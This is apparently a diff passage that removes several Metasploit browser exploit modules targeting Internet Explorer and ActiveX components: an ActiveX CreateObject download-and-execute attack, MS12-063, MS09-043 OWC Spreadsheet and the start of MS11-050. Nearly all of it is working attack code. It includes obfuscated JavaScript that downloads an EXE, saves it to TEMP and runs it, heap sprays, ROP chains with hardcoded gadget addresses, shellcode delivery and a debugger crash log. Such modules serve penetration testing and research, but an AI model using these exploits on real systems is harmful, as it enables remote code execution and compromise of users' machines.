[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
|
||||
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
|
||||
|
||||
# Visual Studio components, not marked as safe
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
|
||||
#
|
||||
# The controls below can launch the "installing component" dialogs...
|
||||
#
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
# Found exploitable in the wild (no details)
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 11 2006'))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
||||
# Build out the HTML response page
|
||||
var_html = rand_text_alpha(rand(30)+2)
|
||||
var_func_exploit = rand_text_alpha(rand(30)+2);
|
||||
var_func_go = rand_text_alpha(rand(30)+2);
|
||||
var_func_createo = rand_text_alpha(rand(30)+2);
|
||||
var_exe_name = rand_text_alpha(rand(30)+2);
|
||||
var_objects = ''
|
||||
|
||||
# Build the object list based on target selection
|
||||
if (target.name == 'Automatic')
|
||||
targets.each do |t|
|
||||
next if not t['CLSID']
|
||||
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
||||
end
|
||||
else
|
||||
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
||||
end
|
||||
|
||||
|
||||
content = %Q^
|
||||
<html><head><title></title>
|
||||
<script language="javascript">
|
||||
|
||||
function #{var_func_createo}( o , n ) {
|
||||
var r = null;
|
||||
|
||||
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
|
||||
}
|
||||
|
||||
return( r );
|
||||
}
|
||||
|
||||
function #{var_func_go}( a ) {
|
||||
|
||||
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );
|
||||
|
||||
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );
|
||||
|
||||
var e = s.Environment( "P" + "ro" + "ce" + "ss" );
|
||||
|
||||
|
||||
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
|
||||
var xml = null;
|
||||
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
|
||||
var dat;
|
||||
|
||||
try { xml=new XMLHttpRequest(); }
|
||||
catch(e) {
|
||||
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
|
||||
catch(e) {
|
||||
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
||||
}
|
||||
}
|
||||
|
||||
if (! xml) {
|
||||
return(0);
|
||||
}
|
||||
|
||||
xml.open("GET", url, false);
|
||||
xml.send(null);
|
||||
dat = xml.responseBody;
|
||||
|
||||
o.Type = 1 ;
|
||||
o.Mode = 3 ;
|
||||
o.Open ( ) ;
|
||||
o.Write ( dat ) ;
|
||||
o.SaveToFile ( bin, 2) ;
|
||||
|
||||
s.Run ( bin , 0 );
|
||||
}
|
||||
|
||||
function #{var_func_exploit}( ) {
|
||||
var i = 0;
|
||||
var t = new Array( #{var_objects} null );
|
||||
|
||||
while (t[i]) {
|
||||
var a = null;
|
||||
|
||||
if (t[i].substring(0,1) == '{') {
|
||||
a = document.createElement("object");
|
||||
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
|
||||
} else {
|
||||
try { a = new ActiveXObject(t[i]); } catch(e){}
|
||||
}
|
||||
|
||||
if (a) {
|
||||
try {
|
||||
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
|
||||
if (b) {
|
||||
#{var_func_go}( a ) ;
|
||||
return(0) ;
|
||||
}
|
||||
} catch(e){
|
||||
}
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload='#{var_func_exploit}()'>
|
||||
#{var_html}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
^
|
||||
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit HTML...")
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
|
@ -1,389 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "7.0",
|
||||
:ua_maxver => "9.0",
|
||||
:javascript => true,
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
|
||||
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
|
||||
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
|
||||
to a use-after-free condition.
|
||||
|
||||
Please note that this vulnerability has been exploited in the wild since Sep 14 2012.
|
||||
|
||||
Also note that presently, this module has some target dependencies for the ROP chain to be
|
||||
valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).
|
||||
For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which
|
||||
is often the case).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # via ZDI
|
||||
'eromang', # First public discovery
|
||||
'binjo',
|
||||
'sinn3r', # Metasploit
|
||||
'juan vazquez' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4969' ],
|
||||
[ 'OSVDB', '85532' ],
|
||||
[ 'MSB', 'MS12-063' ],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],
|
||||
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
vprint_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
return make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
|
||||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
stack_pivot = [
|
||||
0x77c4e393, # RETN
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
0x77c15ed5, # XCHG EAX, ESP # RETN
|
||||
].pack("V*")
|
||||
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
exec_size = 0xffffffff - code.length + 1
|
||||
if t['Random']
|
||||
stack_pivot = [
|
||||
0x0c0c0c0c, # 0c0c0c08
|
||||
0x7c347f98, # RETN
|
||||
0x7c347f97, # POP EDX # RETN
|
||||
0x7c348b05 # XCHG EAX, ESP # RET
|
||||
].pack("V*")
|
||||
else
|
||||
stack_pivot = [
|
||||
0x7c347f98, # RETN
|
||||
0x7c347f97, # POP EDX # RETN
|
||||
0x7c348b05 # XCHG EAX, ESP # RET
|
||||
].pack("V*")
|
||||
end
|
||||
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
||||
end
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
# Spray published by corelanc0d3r
|
||||
# Exploit writing tutorial part 11 : Heap Spraying Demystified
|
||||
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
|
||||
def get_random_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
function randomblock(blocksize)
|
||||
{
|
||||
var theblock = "";
|
||||
for (var i = 0; i < blocksize; i++)
|
||||
{
|
||||
theblock += Math.floor(Math.random()*90)+10;
|
||||
}
|
||||
return theblock;
|
||||
}
|
||||
|
||||
function tounescape(block)
|
||||
{
|
||||
var blocklen = block.length;
|
||||
var unescapestr = "";
|
||||
for (var i = 0; i < blocklen-1; i=i+4)
|
||||
{
|
||||
unescapestr += "%u" + block.substring(i,i+4);
|
||||
}
|
||||
return unescapestr;
|
||||
}
|
||||
|
||||
var heap_obj = new heapLib.ie(0x10000);
|
||||
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset_length = #{t['Offset']};
|
||||
|
||||
for (var i=0; i < 0x1000; i++) {
|
||||
var padding = unescape(tounescape(randomblock(0x1000)));
|
||||
while (padding.length < 0x1000) padding+= padding;
|
||||
var junk_offset = padding.substring(0, offset_length);
|
||||
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
|
||||
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
|
||||
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
|
||||
heap_obj.alloc(sprayblock);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
end
|
||||
|
||||
def get_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
js = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
|
||||
for (var i=1; i < 0x300; i++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
JS
|
||||
end
|
||||
|
||||
|
||||
def load_html1(cli, my_target)
|
||||
p = get_payload(my_target, cli)
|
||||
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
|
||||
|
||||
if my_target['Random']
|
||||
js = get_random_spray(my_target, js_code, js_r_nops)
|
||||
else
|
||||
js = get_spray(my_target, js_code, js_nops)
|
||||
end
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
var arrr = new Array();
|
||||
arrr[0] = window.document.createElement("img");
|
||||
arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
|
||||
</script>
|
||||
|
||||
<iframe src="#{this_resource}/#{@html2_name}"></iframe>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def load_html2
|
||||
html = %Q|
|
||||
<HTML>
|
||||
<script>
|
||||
function funcB() {
|
||||
document.execCommand("selectAll");
|
||||
};
|
||||
|
||||
function funcA() {
|
||||
document.write("#{Rex::Text.rand_text_alpha(1)}");
|
||||
parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
|
||||
}
|
||||
|
||||
</script>
|
||||
<body onload='funcB();' onselect='funcA()'>
|
||||
<div contenteditable='true'>
|
||||
a
|
||||
</div>
|
||||
</body>
|
||||
</HTML>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def this_resource
|
||||
r = get_resource
|
||||
return ( r == '/') ? '' : r
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
uri = request.uri
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
vprint_status("Requesting: #{uri}")
|
||||
print_status(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if uri =~ /#{@html2_name}/
|
||||
print_status("Loading #{@html2_name}")
|
||||
html = load_html2
|
||||
elsif uri =~ /#{@html1_name}/
|
||||
print_status("Loading #{@html1_name}")
|
||||
html = load_html1(cli, my_target)
|
||||
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
|
||||
print_status("Redirecting to #{@html1_name}")
|
||||
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
||||
return
|
||||
else
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
|
||||
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
0:008> r
|
||||
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
|
||||
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mshtml!CMshtmlEd::Exec+0x134:
|
||||
637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
|
||||
|
||||
0:008> u
|
||||
mshtml!CMshtmlEd::Exec+0x134:
|
||||
637d464e 8b07 mov eax,dword ptr [edi]
|
||||
637d4650 57 push edi
|
||||
637d4651 ff5008 call dword ptr [eax+8]
|
||||
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
|
||||
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
|
||||
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
|
||||
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
|
||||
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
|
||||
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
|
||||
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
|
||||
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
|
||||
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
|
||||
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
|
||||
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
|
||||
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
|
||||
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
|
||||
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
|
||||
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
|
||||
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
|
||||
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
|
||||
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
|
||||
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
|
||||
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
|
||||
=end
|
|
@ -1,131 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability within versions 10 and 11 of
|
||||
the Office Web Component Spreadsheet ActiveX control. This module was based on
|
||||
an exploit found in the wild.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! <xchwarze[at]gmail.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-1136' ],
|
||||
[ 'OSVDB', '55806' ],
|
||||
[ 'MSB', 'MS09-043' ],
|
||||
[ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ],
|
||||
[ 'EDB', '9163' ],
|
||||
# broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
|
||||
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => '',
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c
|
||||
],
|
||||
'DisclosureDate' => 'Jul 13 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Send a redirect with the javascript encoding key
|
||||
#if (!request.uri.match(/\?\w+/))
|
||||
# send_local_redirect(cli, "?#{@javascript_encode_key}")
|
||||
# return
|
||||
#end
|
||||
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name}")
|
||||
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
js = %Q|
|
||||
var xshellcode = unescape("#{shellcode}");
|
||||
|
||||
var xarray = new Array();
|
||||
var xls = 0x81000-(xshellcode.length*2);
|
||||
var xbigblock = unescape("#{retaddr}");
|
||||
|
||||
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
|
||||
var xlh = xbigblock.substring(0, xls / 2);
|
||||
delete xbigblock;
|
||||
|
||||
for(xi=0; xi<0x99*2; xi++) {
|
||||
xarray[xi] = xlh + xlh + xshellcode;
|
||||
}
|
||||
|
||||
CollectGarbage();
|
||||
|
||||
var xobj;
|
||||
try {
|
||||
xobj = new ActiveXObject("OWC10.Spreadsheet");
|
||||
} catch(err) {
|
||||
try {
|
||||
xobj = new ActiveXObject("OWC11.Spreadsheet");
|
||||
} catch(err) {
|
||||
}
|
||||
}
|
||||
|
||||
xe = new Array();
|
||||
xe.push(1);
|
||||
xe.push(2);
|
||||
xe.push(0);
|
||||
xe.push(window);
|
||||
|
||||
for(xi=0; xi < xe.length; xi++){
|
||||
for(xj=0; xj<10; xj++){
|
||||
try { xobj.Evaluate(xe[xi]); } catch(e) { }
|
||||
}
|
||||
}
|
||||
|
||||
window.status = xe[3] + '';
|
||||
|
||||
for(xj=0; xj<10; xj++){
|
||||
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
|
||||
}
|
||||
|
|
||||
|
||||
# Obfuscate it up a bit
|
||||
js = obfuscate_js(js,
|
||||
'Symbols' => {
|
||||
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err}
|
||||
}
|
||||
).to_s
|
||||
|
||||
|
||||
# Encode the javascript payload with the URI key
|
||||
# js = encrypt_js(js, @javascript_encode_key)
|
||||
|
||||
# Fire off the page to the client
|
||||
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
|
@ -1,284 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "7.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS
|
||||
#})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability in Internet Explorer. The
|
||||
vulnerability occurs when an invalid <object> tag exists and other elements
|
||||
overlap/cover where the object tag should be when rendered (due to their
|
||||
styles/positioning). The mshtml!CObjectElement is then freed from memory because
|
||||
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
|
||||
a reference to the freed <object> and attempts to call a function on it, leading
|
||||
to the use-after-free.
|
||||
|
||||
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
|
||||
to bypass DEP (Data Execution Prevention).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'd0c_s4vage', #Discovery, poc
|
||||
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
|
||||
'bannedit' #Windows 7
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-1260'],
|
||||
['OSVDB', '72950'],
|
||||
['MSB', 'MS11-050'],
|
||||
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
# In IE6 the mshtml!CObjectElement size is 0xac
|
||||
[
|
||||
'Internet Explorer 7 on XP SP3',
|
||||
{
|
||||
'Rop' => false,
|
||||
'Ret' => nil, #Not required for non-ROP targets
|
||||
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
||||
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
||||
'Offset' => '0x01',
|
||||
}
|
||||
],
|
||||
[
|
||||
'Internet Explorer 7 on Windows Vista',
|
||||
{
|
||||
'Rop' => false,
|
||||
'Ret' => nil, #Not required for non-ROP targets
|
||||
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
||||
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
||||
'Offset' => '0x01',
|
||||
}
|
||||
],
|
||||
[
|
||||
'Internet Explorer 8 on XP SP3',
|
||||
{
|
||||
'Rop' => true,
|
||||
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
||||
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
||||
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
||||
'Offset' => '0x5E2',
|
||||
}
|
||||
],
|
||||
[
|
||||
'Internet Explorer 8 on Windows 7',
|
||||
{
|
||||
'Rop' => true,
|
||||
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
||||
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
||||
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
||||
'Offset' => '0x5F4',
|
||||
}
|
||||
],
|
||||
[ 'Debug Target (Crash)', {} ],
|
||||
],
|
||||
'DisclosureDate' => "Jun 16 2011",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
end
|
||||
|
||||
def auto_target(cli, request)
